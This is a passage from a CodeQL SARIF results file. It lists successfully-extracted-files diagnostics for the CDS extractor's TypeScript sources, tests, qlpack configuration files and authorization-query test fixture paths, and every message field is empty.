","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/compile.ts","uriBaseId":"%SRCROOT%","index":38}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/graph.ts","uriBaseId":"%SRCROOT%","index":39}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/index.ts","uriBaseId":"%SRCROOT%","index":40}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/project.ts","uriBaseId":"%SRCROOT%","index":41}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/retry.ts","uriBaseId":"%SRCROOT%","index":42}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/types.ts","uriBaseId":"%SRCROOT%","index":43}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/validator.ts","uriBaseId":"%SRCROOT%","index":44}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/version.ts","uriBaseId":"%SRCROOT%","index":45}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/parser/functions.ts","uriBaseId":"%SRCROOT%","index":46}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/parser/graph.ts","uriBaseId":"%SRCROOT%","index":47}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/parser/index.ts","uriBaseId":"%SRCROOT%","index":48}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/parser/types.ts","uriBaseId":"%SRCROOT%","index":49}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/codeql.ts","uriBaseId":"%SRCROOT%","index":50}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/constants.ts","uriBaseId":"%SRCROOT%","index":51}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/diagnostics.ts","uriBaseId":"%SRCROOT%","index":52}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/environment.ts","uriBaseId":"%SRCROOT%","index":53}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/filesystem.ts","uriBaseId":"%SRCROOT%","index":54}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/logging/cdsExtractorLog.ts","uriBaseId":"%SRCROOT%","index":55}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/logging/index.ts","uriBaseId":"%SRCROOT%","index":56}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/logging/statusReport.ts","uriBaseId":"%SRCROOT%","index":57}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/logging/types.ts","uriBaseId":"%SRCROOT%","index":58}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/packageManager/cacheInstaller.ts","uriBaseId":"%SRCROOT%","index":59}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/packageManager/index.ts","uriBaseId":"%SRCROOT%","index":60}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/packageManager/projectInstaller.ts","uriBaseId":"%SRCROOT%","index":61}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/packageManager/types.ts","uriBaseId":"%SRCROOT%","index":62}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/packageManager/versionResolver.ts","uriBaseId":"%SRCROOT%","index":63}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/utils.ts","uriBaseId":"%SRCROOT%","index":64}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/cds-extractor.test.ts","uriBaseId":"%SRCROOT%","index":65}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/jest.setup.ts","uriBaseId":"%SRCROOT%","index":66}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/command.test.ts","uriBaseId":"%SRCROOT%","index":67}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/compile.test.ts","uriBaseId":"%SRCROOT%","index":68}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/graph.test.ts","uriBaseId":"%SRCROOT%","index":69}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/index.test.ts","uriBaseId":"%SRCROOT%","index":70}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/project.test.ts","uriBaseId":"%SRCROOT%","index":71}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/retry.test.ts","uriBaseId":"%SRCROOT%","index":72}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/validator.test.ts","uriBaseId":"%SRCROOT%","index":73}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/version.test.ts","uriBaseId":"%SRCROOT%","index":74}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/build-graph.test.ts","uriBaseId":"%SRCROOT%","index":75}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/files-to-compile.test.ts","uriBaseId":"%SRCROOT%","index":76}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/monorepo-support.test.ts","uriBaseId":"%SRCROOT%","index":77}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/project-aware-compilation.test.ts","uriBaseId":"%SRCROOT%","index":78}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/self-parser.test.ts","uriBaseId":"%SRCROOT%","index":79}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/subdirectory-detection.test.ts","uriBaseId":"%SRCROOT%","index":80}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/codeql.test.ts","uriBaseId":"%SRCROOT%","index":81}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/diagnostics.test.ts","uriBaseId":"%SRCROOT%","index":82}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/environment.test.ts","uriBaseId":"%SRCROOT%","index":83}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/filesystem.test.ts","uriBaseId":"%SRCROOT%","index":84}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/logging/cdsExtractorLog.test.ts","uriBaseId":"%SRCROOT%","index":85}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/logging/performanceTrackingIntegration.test.ts","uriBaseId":"%SRCROOT%","index":86}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/logging/statusReport.test.ts","uriBaseId":"%SRCROOT%","index":87}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/logging/types.test.ts","uriBaseId":"%SRCROOT%","index":88}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/packageManager/cacheInstaller.test.ts","uriBaseId":"%SRCROOT%","index":89}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/packageManager/index.test.ts","uriBaseId":"%SRCROOT%","index":90}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/packageManager/projectInstaller.test.ts","uriBaseId":"%SRCROOT%","index":91}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/packageManager/types.test.ts","uriBaseId":"%SRCROOT%","index":92}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/packageManager/versionResolver.test.ts","uriBaseId":"%SRCROOT%","index":93}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/utils.test.ts","uriBaseId":"%SRCROOT%","index":94}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/tsconfig.json","uriBaseId":"%SRCROOT%","index":95}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/validate-bundle.js","uriBaseId":"%SRCROOT%","index":96}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/ext/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":97}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/ext/qlpack.yml","uriBaseId":"%SRCROOT%","index":98}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/lib/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":99}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/lib/qlpack.yml","uriBaseId":"%SRCROOT%","index":100}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/src/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":101}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/codeql-pack.lock.yml","uriBaseId":"%SRCROOT%","index":102}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/qlpack.yml","uriBaseId":"%SRCROOT%","index":103}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/src/qlpack.yml","uriBaseId":"%SRCROOT%","index":104}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds","uriBaseId":"%SRCROOT%","index":105}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/model.cds.json","uriBaseId":"%SRCROOT%","index":106}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json","uriBaseId":"%SRCROOT%","index":107}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js","uriBaseId":"%SRCROOT%","index":108}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds","uriBaseId":"%SRCROOT%","index":109}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js","uriBaseId":"%SRCROOT%","index":110}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds","uriBaseId":"%SRCROOT%","index":111}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js","uriBaseId":"%SRCROOT%","index":112}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service3.cds","uriBaseId":"%SRCROOT%","index":113}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service3.js","uriBaseId":"%SRCROOT%","index":114}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds","uriBaseId":"%SRCROOT%","index":115}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/model.cds.json","uriBaseId":"%SRCROOT%","index":116}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json","uriBaseId":"%SRCROOT%","index":117}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js","uriBaseId":"%SRCROOT%","index":118}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds","uriBaseId":"%SRCROOT%","index":119}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js","uriBaseId":"%SRCROOT%","index":120}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds","uriBaseId":"%SRCROOT%","index":121}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js","uriBaseId":"%SRCROOT%","index":122}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/db/schema.cds","uriBaseId":"%SRCROOT%","index":123}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/model.cds.json","uriBaseId":"%SRCROOT%","index":124}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/server.js","uriBaseId":"%SRCROOT%","index":125}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/framew